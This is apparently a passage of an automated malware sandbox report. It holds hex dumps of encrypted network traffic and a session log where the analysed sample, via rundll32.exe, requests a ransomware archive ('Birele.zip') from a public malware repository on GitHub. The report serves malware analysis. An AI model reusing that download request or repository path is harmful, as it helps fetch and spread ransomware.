                                                                                                                                                    2022-09-29 13:02:08 UTC39527INData Raw: 4c 03 ef 99 74 d7 04 e0 e0 eb 91 00 43 79 ac f2 18 2a f3 47 5c d6 d7 27 b0 25 da 87 01 ba 70 e4 5a ff 63 9d d6 b7 ae d1 3c 37 78 cb a8 7f b9 75 b1 29 51 83 cb 06 19 40 74 c2 3b a8 21 2d 7e 8d 82 40 19 00 9f e0 6f 41 20 76 0a a7 3a a1 e5 90 94 2e 75 f5 05 9f 6a 18 d2 46 7a e2 78 47 0c 9c ac 7c 38 b9 3a c9 63 9a a9 2a 81 83 a3 45 01 b0 55 f6 81 42 82 16 05 e0 a3 b3 3e 51 e1 af 65 81 69 99 94 a2 4f 08 0e 28 5f c1 e8 85 9c 79 f3 99 b6 11 eb 2d 99 23 be 0b d0 2a 65 12 97 15 6f a3 57 3b 09 1a 94 1e 0f e4 c6 12 87 fb aa 4b 26 7d e0 e3 40 ba 57 4d ee 09 67 a3 a0 19 71 43 ac bf 27 71 d4 ef 7c 09 e3 7e 45 fe a1 00 d9 c7 41 71 79 0b 2c ad 50 7f c3 31 25 2d 2f 1c 3f a5 b0 43 5a c4 8c f2 72 70 fe 91 a4 53 8d 0e cc 34 f2 2c 8e ce 3a 82 07 4a fd 47 4f 20 c4 80 fe 78 e6
                                                                                                                                                    Data Ascii: LtCy*G\'%pZc<7xu)Q@t;!-~@oA v:.ujFzxG|8:c*EUB>QeiO(_y-#*eoW;K&}@WMgqC'q|~EAqy,P1%-/?CZrpS4,:JGO x
                                                                                                                                                    2022-09-29 13:02:08 UTC39543INData Raw: a6 bf 07 22 95 8f 84 94 f9 f2 00 f4 0d f9 f4 e9 ab 4a 6a aa a8 af e8 ce d6 75 e0 e4 13 2f 28 e3 71 79 43 65 a2 dc 48 b3 74 9a ab e5 6f df 91 5f 22 88 d4 20 57 c7 d6 53 06 78 a9 21 9f 02 23 7d e4 59 1f c2 93 37 e8 9e da 71 57 25 8c ba c2 c4 79 44 67 a5 de c3 e9 47 e8 65 79 14 d4 92 2d 63 2d 75 0b 89 a3 8f c7 ab 8b d4 c5 8d 41 f4 03 b0 e1 e5 ec 74 82 a7 60 43 12 cd 63 97 34 81 68 24 b0 c9 15 f9 ad b8 c8 24 b4 c6 de d5 d7 05 bd 03 f7 6e b9 6f bc e5 8a 54 38 77 b7 b4 e2 bd a3 d9 3f 83 d9 42 8b fc a4 6d e0 91 ac 50 c7 ea e8 47 50 75 88 23 37 cd 02 fc 48 24 97 e7 3b 34 22 92 bd 19 16 1f 42 f8 06 c4 d9 a3 88 b1 70 7f 5c 0e d7 28 f2 43 2c b1 92 65 80 85 7a a6 a1 6d 73 c1 c7 38 3a fb c6 ef e5 98 35 22 37 b4 9c b9 68 a1 22 75 eb c7 e3 e4 74 fa 7f c8 f2 b5 98 16 ed
                                                                                                                                                    Data Ascii: "Jju/(qyCeHto_" WSx!#}Y7qW%yDgGey-c-uAt`Cc4h$$noT8w?BmPGPu#7H$;4"Bp\(C,ezms8:5"7h"ut
                                                                                                                                                    2022-09-29 13:02:08 UTC39559INData Raw: 5e 17 75 6c b3 25 52 16 be 6b cf 2f 3b 84 7a 4f 54 34 3b 54 7c 87 fc 4d df e5 3a 95 42 56 ce c9 3e 90 0a 0b 3c 46 db 0d 38 e7 ea f2 18 b5 cf 4e 58 24 da d8 2f 04 e3 68 58 66 28 6e e1 1f a4 6b 82 f5 5c a5 37 ee 55 3f 21 6a 76 dd f3 aa f5 b0 39 c4 e5 11 15 c1 3a d4 eb e0 92 3a 9c 27 40 2b d2 a0 ae 4e fe 70 be d0 12 fc 5b cc 92 99 5c 2e be 14 e1 1e fd 43 7f f1 b3 64 a6 24 11 d1 93 94 4e ac 26 fe 9b 8a f3 95 b7 ba 6c 50 41 e3 8c b6 19 51 66 ae a9 70 a0 55 63 36 69 87 e6 d7 cc f4 56 9e fc a7 c3 26 7b ce 62 2e 69 99 e1 6d ab c0 da 7d d4 8c 28 2a 46 51 04 70 84 f3 46 d6 24 44 1f 4b 21 99 5c 43 29 c0 f5 4b b4 51 cd 91 f5 fb 2d f8 ec 50 28 19 63 d2 3d 75 a9 d5 58 8f b1 f6 5b d6 da 8c 50 5a eb 7a 9e 1b 8f 72 2a 12 cd 5f d1 27 32 74 28 1b f9 31 29 82 cd e6 8a 89 5e
                                                                                                                                                    Data Ascii: ^ul%Rk/;zOT4;T|M:BV><F8NX$/hXf(nk\7U?!jv9::'@+Np[\.Cd$N&lPAQfpUc6iV&{b.im}(*FQpF$DK!\C)KQ-P(c=uX[PZzr*_'2t(1)^
                                                                                                                                                    2022-09-29 13:02:08 UTC39575INData Raw: a1 20 33 b9 bc 0f 2d 4e e4 00 ff 62 35 f6 95 ca cd 09 9f 09 89 a6 52 2d e9 b4 39 1a ca fa f3 cb 0e fd 04 46 f2 e0 25 20 49 bb 66 e4 bd 4a c1 76 bb a5 05 1e e4 d3 02 09 b2 5d f8 86 48 d2 8d 6f e4 62 e9 31 8b ce 64 18 5c dd 0c e0 56 9b a1 44 29 4e 19 4c 8a 3e f2 77 0f e8 ed bd 61 7c ac 55 6e 1a a8 72 90 08 67 f5 96 57 55 bd d9 16 71 e2 bf f5 b9 70 80 9d 01 11 bb 8f f3 35 fa 3d b4 3a 03 7f 03 de 61 5c 3e 35 ce c3 c7 83 c7 b4 9d 09 48 49 55 2e 3b af 9a c0 35 7e b2 00 d6 d7 93 e9 7a 93 e6 2f c3 e4 5f 8f 7c 2d 61 90 54 ed 67 e8 8d d0 a5 28 ab b7 09 39 90 b1 cc 90 d7 d6 ae 5f b8 f4 71 4a fd b3 c6 86 6b f7 c7 29 3f cb f1 c5 e7 f4 a9 79 f4 f6 5d 76 a0 82 ef 0a 9a 89 37 d1 25 ac 05 03 d0 ba 88 f3 ae de 7c d5 5c 7f e6 2d c0 a1 c3 93 12 b7 3d 82 bc c4 86 41 3c fc 60
                                                                                                                                                    Data Ascii: 3-Nb5R-9F% IfJv]Hob1d\VD)NL>wa|UnrgWUqp5=:a\>5HIU.;5~z/_|-aTg(9_qJk)?y]v7%|\-=A<`
                                                                                                                                                    2022-09-29 13:02:08 UTC39591INData Raw: b7 ba 56 66 0c bc e3 9e 76 70 03 46 37 25 20 fb ea bf 06 bf f6 ae 71 db d3 d0 a3 52 4a d3 23 c9 b8 98 9a b9 da 3c 4b 10 c3 d4 f4 dd 7d 53 37 a0 0d cf 67 d9 97 19 6d 33 c6 6e 65 a1 a5 c3 0e bd c2 fe ab 79 ae 90 06 8e 80 90 45 41 87 0a 7c 18 88 96 92 8b 9e 70 5d 8f 0e fd f3 2f b0 14 69 ec 72 f6 dc fa f0 18 68 59 ce 81 fd d6 ed 16 ba f5 4f e5 bf bf 9f 6e 81 89 12 83 97 ac a3 12 d8 52 3c 9b 41 b8 3c f9 39 3c df 8a 81 30 fd ff 81 d1 68 2b b2 8e d4 16 6e 6e ee 3f 9a 53 3a ae a9 08 ef 41 10 ab 64 8b 81 1c 2f 2d 13 7e ad 74 6f 1f 6e e1 bb 72 d6 13 bb a1 72 a3 52 51 e5 b7 89 ac 7c c4 98 1e 97 c1 23 4e 51 b8 fe 3c 0e d9 6c d1 8c 31 26 c4 0b e3 8e 76 4a 04 f3 ff 70 b8 87 00 30 5d 17 49 84 e2 02 59 eb 05 16 23 5a 56 ab 58 89 5b 6a a4 7c c3 21 1e a2 0a d4 b6 98 db f4
                                                                                                                                                    Data Ascii: VfvpF7% qRJ#<K}S7gm3neyEA|p]/irhYOnR<A<9<0h+nn?S:Ad/-~tonrrRQ|#NQ<l1&vJp0]IY#ZVX[j|!
                                                                                                                                                    2022-09-29 13:02:08 UTC39607INData Raw: 82 07 ac ab 49 58 1f b3 d4 0e ab c0 f2 fb a5 38 3d f9 52 5f f4 0e 6d 64 0a 5f 5f a4 e5 a0 c8 d8 92 f8 59 71 5d 11 27 ef f1 23 2d cf 16 5c 0d e4 cc 86 ec 72 da 98 5e 3b 73 56 23 79 60 65 6c f7 6f 4a 92 d7 0c 60 cf 05 ec 4e 83 cc e1 7a 29 9d d8 be de 46 37 4a 6d 51 0a c9 fb 10 81 cf e9 fb fd a8 7b c5 71 ea 50 6e 9e 29 2d 15 09 b9 01 55 a6 88 04 a4 0a be 56 21 59 c7 29 2c 97 7d 7e 68 2e 45 bf ad 41 cd 30 95 f3 27 7f 33 2e 98 4f 0c ec 0c b0 d8 07 ee f7 16 73 f7 7b 94 4d 89 73 d2 25 b3 3a 2c 5c 15 b7 40 55 71 e1 59 39 d4 5f af 8f 0d 74 21 d6 60 b9 61 a4 45 e3 a3 db ed 95 33 b1 b8 a8 08 f2 3a 9d 09 89 29 97 72 00 d9 35 ff 87 d2 b8 e8 d2 20 3e a2 b8 67 d4 3d 0b 1c 91 e7 ab f9 9a 78 aa bf 22 35 15 84 83 98 3d 48 4a 3d da c5 14 c1 4b e3 08 b9 cf f6 6d 08 32 ec 3b
                                                                                                                                                    Data Ascii: IX8=R_md__Yq]'#-\r^;sV#y`eloJ`Nz)F7JmQ{qPn)-UV!Y),}~h.EA0'3.Os{Ms%:,\@UqY9_t!`aE3:)r5 >g=x"5=HJ=Km2;
                                                                                                                                                    2022-09-29 13:02:08 UTC39623INData Raw: 4a b7 fa ea 21 46 9a 5a 48 f2 61 97 a8 f0 ed aa 5a 35 6a 3f 65 29 f4 87 9a 1e dd 3b 89 de 41 f4 19 2c be 62 e5 f1 05 0c b0 c1 aa 18 46 6e d2 42 0e 4f e2 1d 3d 90 c5 da 3c 02 4f 44 ed 25 e4 81 98 59 52 bc 40 4e 11 79 33 f5 0b 74 db cd a5 9a 21 65 01 b1 51 b2 76 47 b9 be bc 8d 4f fd 4c 48 6a d4 0b 13 21 90 5c 5d 80 eb af fc d7 11 7e 21 22 39 46 fd f6 27 fc cc e8 26 53 74 0c 72 38 fb 5d b5 ce 9c 4c 75 60 f6 84 17 23 d7 bd fa ad 9d 16 62 9b ce 07 b9 04 79 56 67 d2 8b 79 38 b5 9c 74 5b 5e 43 64 62 2a cf 30 30 05 6f e7 9d 2b 4b 4e ac 01 52 63 74 0d 41 8c 79 12 79 6b 36 a7 55 a3 22 e9 6f f8 8e 8d 0b 73 83 10 5e b4 6c fe b1 b3 b8 ab 0f 84 fa a3 67 d9 ca 8d c2 e9 b0 67 a4 46 51 1e 40 d4 0e ba 2e 96 ac 57 b6 11 b7 fc 9b 6b 5e 89 c3 d5 97 f2 f2 bc b6 1e 2b e6 aa 50
                                                                                                                                                    Data Ascii: J!FZHaZ5j?e);A,bFnBO=<OD%YR@Ny3t!eQvGOLHj!\]~!"9F'&Str8]Lu`#byVgy8t[^Cdb*00o+KNRctAyyk6U"os^lggFQ@.Wk^+P
                                                                                                                                                    2022-09-29 13:02:08 UTC39639INData Raw: a5 3d 82 9f 32 24 34 5c d1 a6 e8 6b e5 29 ed 9d 0a 0a e0 da 92 4b e7 d7 d7 5d 09 11 8d 70 3a a4 fb 79 2a 33 ac b9 ec 3b 96 60 2f 22 e4 4b 4b ad 09 ea c6 3e 7e 8b 7a 36 4c d5 36 19 75 ad 6e 7f 11 ac 70 47 2e b8 ed 67 61 bc 27 db e2 60 dd 6b 39 9f f4 40 e7 e3 ab d4 d9 87 cd c6 35 1f 0f f9 df cc 98 f3 4b 81 99 8e b2 d1 21 15 eb 75 2a ec 61 65 2d 48 e8 98 10 2d dd 97 aa 5a 6f 0f fe 2b 49 57 bb 73 22 75 3f cb 50 f3 4c 06 d2 36 bd 5b ba 9c 64 c2 29 b5 c1 ef 55 9e fd c8 d1 9b 86 e8 01 32 94 d0 1e 66 f1 46 de 2b bb c7 5a 04 c1 da 8b 04 7a 51 62 3f 51 78 a8 30 af 61 9b 03 76 b6 0e 48 f6 44 ae 90 6f 47 a0 13 0b 24 c8 fd 3f f9 95 4c 4b 0d 2f d9 66 14 a0 f7 c1 06 6d a1 d8 1b 83 f9 7b 6b ea 01 9e 6d 47 90 41 f6 5a 45 a6 1b 52 09 89 7b 86 5e cd 61 15 6f ca 8d b8 96 c8
                                                                                                                                                    Data Ascii: =2$4\k)K]p:y*3;`/"KK>~z6L6unpG.ga'`k9@5K!u*ae-H-Zo+IWs"u?PL6[d)U2fF+ZzQb?Qx0avHDoG$?LK/fm{kmGAZER{^ao
                                                                                                                                                    2022-09-29 13:02:08 UTC39655INData Raw: 92 8b 0c b3 1b 22 92 6f 65 81 de 60 43 67 70 38 ae 18 5c df fc 68 6a d6 d4 a1 85 ef 1a b8 ef 8b 35 bb c5 49 ca 46 88 8a 43 1d 20 a1 eb 41 a2 89 ff 37 bc 8b ee d2 84 6c 51 7e c4 fb 96 e2 85 03 a3 a1 23 f0 b3 c2 69 02 0d c9 c2 62 5f 00 fe 0d 57 49 f6 f3 a2 af c0 43 b6 7a 90 aa cd 29 50 20 b1 f8 5a 86 28 6d ee 66 33 6e b6 29 32 28 7c 0a b5 1f 0a 88 44 05 2f c1 41 55 53 e8 e8 fd 33 0a 08 49 e5 88 f5 cd c4 9d be 28 20 81 8a 19 db ee 31 95 5a 92 f1 6d f8 4c 53 48 ba ed eb 99 73 7a 56 2a f7 6f 86 db 7f 90 f8 24 81 52 08 ed d3 43 9a 53 a5 06 a3 4f 01 1c 71 d2 33 d0 a5 84 d7 59 22 4d e7 a3 62 d5 13 dc 0c 1d e4 37 e7 9d 5f 32 40 05 f9 39 90 37 65 18 da ce ab eb be 8e 21 06 a3 41 af 27 97 68 30 da 3a 0d 26 8e 2a cb 4a 51 b5 6d f7 7f 74 9c 19 1c 17 04 41 46 b4 56 83
                                                                                                                                                    Data Ascii: "oe`Cgp8\hj5IFC A7lQ~#ib_WICz)P Z(mf3n)2(|D/AUS3I( 1ZmLSHszV*o$RCSOq3Y"Mb7_2@97e!A'h0:&*JQmtAFV
                                                                                                                                                    2022-09-29 13:02:08 UTC39671INData Raw: 67 06 27 c1 a7 7d e3 b5 1d 03 ca e1 fa 20 c8 c5 42 60 27 a0 ce 04 92 b9 cc c8 b2 4e 69 09 06 b9 d9 18 85 58 d5 ba cf 2e 49 33 9a 96 a5 8f c4 61 49 8c 49 23 f0 2b 07 32 f4 62 1c 94 81 0f 54 a5 67 e5 11 1b 68 ab 52 11 a6 02 10 ca 60 ac 7d 4d cb 01 84 32 13 e6 dc 65 1c 5e 37 ab 2f b6 33 52 53 95 05 97 89 9a 17 95 91 6c 21 c8 08 9b bc fc ea 32 c9 cc 2c ab 4b a6 e6 29 0a f2 d2 1c d8 9a 32 ef 45 af 36 04 69 14 c9 da 92 26 22 6c ef 55 d6 64 e6 35 a2 34 b0 75 08 be 65 69 31 03 ec 31 75 f5 ae bb f4 5b a8 03 22 e0 b8 83 dd 67 e0 1e 43 b8 41 8a bc ae c5 f4 b5 32 6b f7 72 4b 49 b5 a5 79 f1 af a2 56 65 83 d9 e4 18 1b 32 9d 93 66 92 73 a0 ff 2c 39 2a f1 ea a9 11 4f e9 0e 49 ad f4 e4 f0 04 97 89 ff f2 6e 10 4b 48 fc 48 be c4 79 e0 05 28 08 da b4 be 00 6c 1e 1a 4c 62 d4
                                                                                                                                                    Data Ascii: g'} B`'NiX.I3aII#+2bTghR`}M2e^7/3RSl!2,K)2E6i&"lUd54uei11u["gCA2krKIyVe2fs,9*OInKHHy(lLb
                                                                                                                                                    2022-09-29 13:02:08 UTC39687INData Raw: 1c b3 90 c3 00 28 f9 17 1e fc ec a8 be ff 0e 47 f9 23 ae 2a 2d af fb 76 b9 6c b0 cd b3 40 df a3 1a 0a d7 11 51 fb 41 ba 5e 61 f6 86 74 52 42 af c2 8f 0e ed c5 82 12 b8 3c ff b9 84 fc b3 84 5a 40 12 21 a7 45 7d 00 0b 2b 48 79 0c b3 de ed dd 4f 1f b7 1c d5 e3 5f 30 0f ed 85 f9 65 80 6e 40 b7 8f e3 30 1c af 5c da 5f 0b fd 9f 0b 67 e9 79 b7 ee 63 2f c5 fd 26 d9 1e 00 9b 34 34 7b 8b 9c 6c fd 9c de 3f 4c b7 42 22 3b 3f 51 f4 97 ec 07 31 f6 b6 87 36 29 5e 4d c0 d2 72 5a 4c 8e fe 90 59 98 4d e1 55 84 09 e9 b0 d5 13 d0 c2 37 59 84 70 0d 61 e8 ea 68 98 7a dc 33 b6 b4 38 0c d0 c3 d2 f5 21 a8 74 34 66 50 30 12 06 0f 2d fc c2 65 0b 9b 52 a9 1d fb ae 72 36 05 7d 02 8d c8 4b 12 18 7a 51 1c 3e e3 e3 f7 ef 8a 66 9e 77 ca 7c 55 46 52 14 f7 b5 c7 5c 8f 9e cd 5d 03 43 6d b2
                                                                                                                                                    Data Ascii: (G#*-vl@QA^atRB<Z@!E}+HyO_0en@0\_gyc/&44{l?LB";?Q16)^MrZLYMU7Ypahz38!t4fP0-eRr6}KzQ>fw|UFR\]Cm
                                                                                                                                                    2022-09-29 13:02:08 UTC39703INData Raw: 09 53 96 8b 81 83 72 a9 03 2d 38 5b 49 ef 0c 56 8e 16 34 7a c1 63 6a 1d 3e c2 05 06 53 ef fa 07 24 cc 99 ac 66 e8 3f af 8b c3 0b 8d 7a 00 34 34 c0 6a f9 fb be 75 62 91 26 f9 df ee 6e aa 94 20 07 8a f7 60 a1 67 44 f2 2e 47 d4 92 83 86 67 bf 80 77 e4 d1 2d c9 d8 3b b6 55 b0 fc 07 6d 16 ce 24 68 ee 52 c0 d7 73 31 04 a9 b6 2a 17 c3 a9 91 dc 9f dc 62 af d7 a2 7a 51 45 a3 72 82 57 ee 06 23 9c 09 33 11 6e 1a 4d e2 58 55 c8 59 ca fb a4 0d 74 84 00 27 a5 e0 4f 71 6f 30 c6 fa 77 d9 f8 27 84 e1 7b 98 ea 09 1e 4f 55 62 c2 05 7a e3 50 29 df 03 42 5c 11 04 af 4d 6e 80 a8 e5 f6 3b 98 72 2b 99 65 5b 1f 69 d9 a0 e4 2c f4 af b5 a4 11 d5 79 1d 7b 4f 29 aa 7c 2e 59 7b d2 42 ac e3 f7 42 03 56 3d ca b5 75 8c f3 41 a9 71 be 3c c2 54 16 79 ed e5 e7 d7 9e 54 a2 a5 fe 18 5b 37 97
                                                                                                                                                    Data Ascii: Sr-8[IV4zcj>S$f?z44jub&n `gD.Ggw-;Um$hRs1*bzQErW#3nMXUYt'Oqo0w'{OUbzP)B\Mn;r+e[i,y{O)|.Y{BBV=uAq<TyT[7
                                                                                                                                                    2022-09-29 13:02:08 UTC39719INData Raw: ad 77 bc ed 71 9b a0 65 c5 8e 3a 2e d6 df ca d2 a7 cd 0a f8 7e 1e 09 2e b9 c2 66 eb 21 50 cd 54 75 c8 6b 42 87 5c e4 17 48 f1 f4 ea 82 8b d8 c0 17 58 a2 cf 6f 27 c1 0f 39 a6 1f d1 44 b8 76 cd da 03 08 0b 05 ee 89 7c f4 22 7a 27 65 7b ed 3f dd 47 e6 1b 69 cc e8 b6 33 03 53 ab 96 c8 de c5 b3 d1 a5 3b 44 bd e4 03 f0 f9 3b b0 b5 c6 23 29 88 3a cd 4e 56 f0 a0 d1 4c 55 20 68 8b 2c f5 ce 19 f5 8c 28 e0 9e 6e 6b 63 cf a4 55 96 e4 9f 7b 39 0c 34 2f c2 18 df 61 74 fb 8e f1 c2 2d 1b 09 83 75 27 e5 19 7b 20 aa 37 54 fd 35 44 01 27 8e 78 91 83 df a4 03 18 b2 2c 2c e9 8d 2e 35 b8 99 99 52 70 c4 ce af 75 70 52 7b c8 fa 01 a8 37 d6 e5 5f 6d d3 5e 6b ba 37 c4 53 ec 25 d9 9b 92 59 22 79 cf 4f 99 49 c5 8a 14 9a ec 8b ec d9 88 32 10 46 1f 1b 4c 32 0b 93 b3 2e 4a 3e 3e e2 e9
                                                                                                                                                    Data Ascii: wqe:.~.f!PTukB\HXo'9Dv|"z'e{?Gi3S;D;#):NVLU h,(nkcU{94/at-u'{ 7T5D'x,,.5RpupR{7_m^k7S%Y"yOI2FL2.J>>
                                                                                                                                                    2022-09-29 13:02:08 UTC39735INData Raw: 95 7d a3 a2 c9 24 7f 56 87 9d c6 a1 d1 70 67 98 fb e4 7e f1 a8 7d 13 28 16 26 6d 75 96 c0 46 43 85 a6 ff f8 19 a1 42 23 80 54 30 e6 e1 a7 fb c4 6c 36 7b ad dd 4c 42 8a 82 f0 de eb 78 14 8e bc 57 a8 e8 a3 03 15 f6 c9 1d 41 15 cc 77 89 02 f8 b0 27 97 d9 58 d1 64 ae b7 59 b4 04 38 4d c5 00 25 d0 77 af b8 08 ec 97 86 9b 7c 3b 99 b2 91 62 40 e0 1e 99 73 e7 3e 0c b9 a1 ab 91 71 24 5b 65 92 0c c1 75 02 08 65 cc 6f 4e fc 51 76 11 2f f0 28 f1 76 ad 22 98 cc 00 1e c9 54 03 a0 d2 70 16 4d f0 aa 20 96 c2 ea 32 f8 cc f1 71 7f ac 3b c2 96 94 3d 15 60 3b 06 14 ea f4 0c 93 5c f4 84 9e e6 6d e3 dc 88 ff 20 ac 7a a5 c1 a6 fa 2d 1c a4 fc 48 97 ac 0f a6 77 65 9d 01 4a 36 24 90 d2 0d 00 60 51 f1 f5 34 83 55 15 91 f3 04 6f ca e8 fb 97 da b1 84 4f 65 89 63 54 0d 74 1c 0f 14 0c
                                                                                                                                                    Data Ascii: }$Vpg~}(&muFCB#T0l6{LBxWAw'XdY8M%w|;b@s>q$[eueoNQv/(v"TpM 2q;=`;\m z-HweJ6$`Q4UoOecTt
                                                                                                                                                    2022-09-29 13:02:08 UTC39751INData Raw: 9a 32 83 f6 fb b1 d5 55 99 7c b8 77 a5 5b 2f 69 03 4f ce 77 52 c8 76 89 0c c7 fa 16 46 00 04 2d de 3d dd ca f2 cc fe 29 ff f1 79 12 77 ba 4b c6 da d2 74 de e8 ed 85 60 3d 48 76 59 2a 5d 23 f9 e8 a8 bd a2 00 df 53 fa 05 d7 67 dc 8a 90 70 93 d0 96 21 39 c8 f5 24 11 a6 87 f9 6a 41 6b ad de 46 16 40 df 8b ae 16 e3 fe cd 1b c9 7a a1 11 27 c0 ff 5a 72 64 90 39 e9 90 35 01 27 90 70 5a 3e ff 0c 88 e5 be 65 76 52 1c 84 25 c1 7f 4b a1 33 ee 65 86 12 cb db c9 e4 1a 0e a0 1a 1b ca 7a fa 11 21 e5 4a 59 6a 07 20 ca d5 92 46 63 54 24 46 53 bf 23 1b 67 cb 01 43 cd a3 b1 01 33 41 70 aa 78 59 14 3a 68 17 00 81 23 8e 00 ea 71 04 5f 0a 6d 4a b5 3d 52 9a d9 76 ab de f5 60 21 55 44 a4 c9 b4 f1 f2 37 e9 b2 bf 9b 30 6f 0e 7d af 47 9c 74 26 4c a4 da b3 2a eb cd ff 12 37 a4 69 4a
                                                                                                                                                    Data Ascii: 2U|w[/iOwRvF-=)ywKt`=HvY*]#Sgp!9$jAkF@z'Zrd95'pZ>evR%K3ez!JYj FcT$FS#gC3ApxY:h#q_mJ=Rv`!UD70o}Gt&L*7iJ
                                                                                                                                                    2022-09-29 13:02:08 UTC39767INData Raw: ea 74 52 15 eb 2d 7d 99 63 6b 1f 00 14 aa b9 d4 95 5c 36 f3 df d2 3c 13 7b fa 53 77 57 da 2e 4d 8f 3e 64 55 11 54 22 1b 6a 97 2d d3 53 98 2f 2e 85 8b 10 17 ea 3f 82 9e 37 22 25 b0 c1 6f 98 a6 54 30 c3 6c 7b d6 7a 86 b4 a2 c0 59 44 b1 c0 5c 07 6a c9 1d b2 ed a9 49 f2 6e a7 a0 c6 12 ef 13 7e d0 ef 9b 5d 3e 53 47 f4 6e cc b3 4f 9c bc 67 59 bb 7b 08 ca 08 17 b9 ca 89 62 83 c9 6a 70 b7 e6 b3 73 9a 62 b7 71 62 6d a1 ef 98 a6 81 a6 94 89 f8 0a d3 95 f5 0a 18 2e e9 fe 3f f4 48 0c 6f e7 d7 a8 0f 67 9a 5d 51 75 19 0a 1c ff 4a 89 4f 06 c0 98 a7 0a ad ad f3 5b a8 cd fd db b0 2c 31 24 85 5a 3d 61 d6 87 8f 85 f7 87 5f fa 59 10 c8 8b 0e e6 5a f3 7a d3 00 49 df 6c e2 92 a8 ef 4d 45 d9 d8 91 ce c9 06 88 b3 ce b6 5d d4 11 31 21 81 67 55 ae a3 59 d1 f9 d1 20 57 34 30 9b 96
                                                                                                                                                    Data Ascii: tR-}ck\6<{SwW.M>dUT"j-S/.?7"%oT0l{zYD\jIn~]>SGnOgY{bjpsbqbm.?Hog]QuJO[,1$Z=a_YZzIlME]1!gUY W40
                                                                                                                                                    2022-09-29 13:02:08 UTC39783INData Raw: c4 8c 85 fe d1 11 af e2 9b 90 4b a2 13 6e 3a 02 2b 13 2d a7 3b 6b 46 8e d4 b3 9c 48 d4 07 3d 5f d1 ed e6 42 8c 0a 40 56 62 23 ba de 35 45 db da 63 bf 7b 45 4b 07 37 b7 cd 84 3d 2f d1 cb e2 98 49 a3 d9 b8 8a e7 d4 3c 64 64 31 52 bc 56 99 8c 66 45 fd e7 ae 1d 51 55 47 a7 32 66 5c 55 f4 e4 e5 32 3c 30 c6 c4 6f 62 86 58 7c 65 cc b7 cb a9 0b 6f a0 b6 e2 d5 65 5a b2 a3 27 3d ac 49 70 7e 8b e3 be 23 7e 2a 11 c0 d2 41 c2 5a 64 c0 63 b7 79 15 e6 8b d2 7c 98 6e d8 6a 9c 7b 42 6e ec 04 2f d1 9f 39 7c 5b 6d 49 d9 2b 0b 7b dc 41 35 8e 78 43 c0 d3 46 5c e1 d4 16 c6 bb 0a 61 f6 4b 10 57 a3 d1 f9 9b 37 27 4a b8 db 2d 7b 99 f1 7d d3 1d 59 33 20 4e a9 bb 96 5f e6 28 51 9d d5 77 c4 19 21 1d d2 70 0f b8 3a f4 be ef 1e 39 9f fd 27 49 8d 7d 7c d3 de d0 b9 cd ab 9d 8f 7f 5c 0a
                                                                                                                                                    Data Ascii: Kn:+-;kFH=_B@Vb#5Ec{EK7=/I<dd1RVfEQUG2f\U2<0obX|eoeZ'=Ip~#~*AZdcy|nj{Bn/9|[mI+{A5xCF\aKW7'J-{}Y3 N_(Qw!p:9'I}|\
                                                                                                                                                    2022-09-29 13:02:08 UTC39799INData Raw: cc a0 64 1a 39 39 be 5a 82 c5 02 c4 28 74 00 0c 02 66 29 f3 b5 d7 ef 21 10 cd 69 5c 21 8c f8 b4 48 60 03 3b 3a 7e c1 89 8b 00 63 b5 65 78 0e f6 67 63 f6 fc da 80 91 34 20 8b e8 2d 9f e8 9c f1 8e 1a c2 6a ea 04 73 b2 e2 29 89 13 af e7 e2 16 0e 70 6b 5e 44 e1 1b 4c ad 8a 35 47 18 7e e8 a7 3e f8 06 83 c4 88 07 b9 78 62 fd b5 71 34 da c4 31 fc 62 4c 4d a7 28 5f 68 47 8f f8 14 e3 81 2f 52 35 35 66 3a 07 78 8c 87 0c e3 49 a6 e8 e2 c0 02 50 f6 06 f8 f6 0c 5c fb 89 c6 74 69 fa 85 44 8c 20 b6 52 35 6d 33 6f 51 0f 63 e2 88 aa c9 45 fa 7e 20 d6 b4 da 6a 17 98 68 6f d0 60 a2 a0 c0 3f 8d 5e 1a 17 64 90 82 75 91 81 ee 2d 10 0d 44 3b 61 8a 82 b0 df 24 20 25 9b 80 05 da 66 a6 9e 8d 06 03 eb 60 63 18 5e e3 5b bd 87 66 24 52 15 3a 36 1d e0 1e 6a 92 39 4c 1a 6e b5 c4 9e 80
                                                                                                                                                    Data Ascii: d99Z(tf)!i\!H`;:~cexgc4 -js)pk^DL5G~>xbq41bLM(_hG/R55f:xIP\tiD R5m3oQcE~ jho`?^du-D;a$ %f`c^[f$R:6j9Ln


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    174192.168.2.349944140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:02:10 UTC39808OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    175140.82.121.3443192.168.2.349944C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:02:10 UTC39808INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 13:00:59 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
